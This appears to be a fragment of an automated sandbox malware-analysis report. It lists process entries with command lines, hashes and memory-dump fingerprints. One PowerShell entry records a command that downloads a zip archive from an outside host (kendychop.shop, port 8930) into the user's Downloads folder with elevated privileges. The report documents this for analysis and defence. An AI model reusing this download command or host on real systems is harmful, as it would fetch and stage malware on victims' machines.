                                                                                            Reputation:high
                                                                                            Has exited:false

                                                                                            Target ID:12
                                                                                            Start time:16:12:06
                                                                                            Start date:12/11/2024
                                                                                            Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2076 --field-trial-handle=1716,i,7911197355517073219,1355922153495788486,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                                            Imagebase:0x7ff70df30000
                                                                                            File size:3'581'912 bytes
                                                                                            MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:false

                                                                                            Target ID:19
                                                                                            Start time:16:13:05
                                                                                            Start date:12/11/2024
                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kendychop.shop:8930/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }"
                                                                                            Imagebase:0x7ff6e3d50000
                                                                                            File size:452'608 bytes
                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Reset < >
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2754381615.00007FFD32E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32E00000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_7ffd32e00000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3e6ffc2d01485e3675e6a7ede7ef7c0dc479045d5709cc38633428d358b59bad
                                                                                              • Instruction ID: 57deb79a7dcaf2280616ba149fa2669cf80437f4a1c4420189f3ee07e2ebddef
                                                                                              • Opcode Fuzzy Hash: 3e6ffc2d01485e3675e6a7ede7ef7c0dc479045d5709cc38633428d358b59bad
                                                                                              • Instruction Fuzzy Hash: 0C01A73021CB0C8FDB44EF0CE051AA5B3E0FB85324F10052DE58AC3655D632E882CB45